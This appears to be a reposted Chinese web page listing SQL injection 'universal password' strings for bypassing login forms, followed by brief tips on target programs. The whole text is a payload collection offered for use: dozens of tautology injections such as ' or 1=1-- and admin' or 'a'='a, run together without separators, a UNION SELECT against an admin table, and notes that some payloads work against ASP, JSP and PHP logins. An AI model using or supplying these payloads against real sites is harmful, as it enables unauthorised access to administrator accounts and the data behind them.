各种利用形式如下：

'or'='or''or''=''or ''='" or "a"="a"or "a"="a"or 1=1--"or 1=1%00"or"="a'='a"or=or"') or ('a'='a')or('a'='a1 or '1'='1' or 1=11 or '1'='1'=11'or'1'='1admin' or 'a'='a 密码随便admin'or'1'='1'--admin' or '1'='1'--a'or' 1=1--a 'or' 1=1--or 1=1--'or 1=1--'or' '1'='1or 1=1-- ''OR 1=1%00or 'a'='a'or'='1''or''=''or''='' or ''=''or''=''or'1'='1' or '1'='1'or'a'='a' or 'a'='a'xor用户名: ' UNION Select 1,1,1 FROM admin Where ''=' （替换表名admin）密码: 1

特殊说明：

1.admin ' or '  membership/login.asp（国外某程序）

2.admin 1'or'1'='1 用于jsp程序，如果管理员有admin这个用户，有一定成功率。

3.存在字符型注入的php网站是可以用万能密码' or 1=1/*的（某文章提到过）

本站仅提供存储服务，所有内容均由用户发布，如发现有害或侵权内容，请点击举报。